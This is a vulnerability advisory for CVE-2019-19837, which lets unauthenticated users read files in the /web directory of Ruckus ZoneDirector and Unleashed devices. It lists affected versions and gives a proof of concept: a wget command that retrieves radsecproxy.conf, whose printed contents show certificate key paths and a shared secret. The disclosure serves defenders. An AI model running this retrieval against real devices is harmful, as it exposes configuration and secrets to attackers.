<--

Information disclosure vulnerability

Aleph Research Advisory

Identifier

CVE-2019-19837

Severity

High

Product

  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7

Technical Details

‘Embedthis-Appweb/3.4.2’ configuration file - webs.conf, lacks access control. An attacker can fetch any file from the /web directory, regardless of its file extension or type. web directory contains sensitive information such as backend code, executables, and symbolic links to /tmp directory.

Proof Of Concept

Example of information leakage from /web directory

➜  /tmp wget -q 192.168.0.1/uploaded/radsecproxy.conf
➜  /tmp file radsecproxy.conf 
radsecproxy.conf: ASCII text
➜  /tmp cat radsecproxy.conf 
ListenUDP               *:1815
PidFile                /var/run/tac/radsecproxy.pid
LogLevel                3
LogDestination          x-syslog:///LOG_LOCAL2
rewrite delSuffix {
    modifyAttribute 1:/^(.*)@(.*)$/\1/
}
tls default {
    CACertificatePath    /etc/airespider/certs/ca
    CACertificateFile    /etc/airespider/certs/cacert.pem
    CertificateFile    /etc/airespider/certs/webaccert.pem
    CertificateKeyFile    /etc/airespider/certs/webackey.pem
}
client 127.0.0.1 {
    type udp
    secret secret
}
client [::1] {
    type udp
    secret secret
}

Timeline

Posts

Credit

External References

  1. Ruckus Networks - Security Advisory ID 20191224 - txt
  2. Ruckus Networks - Security Advisory ID 20191224 - PDF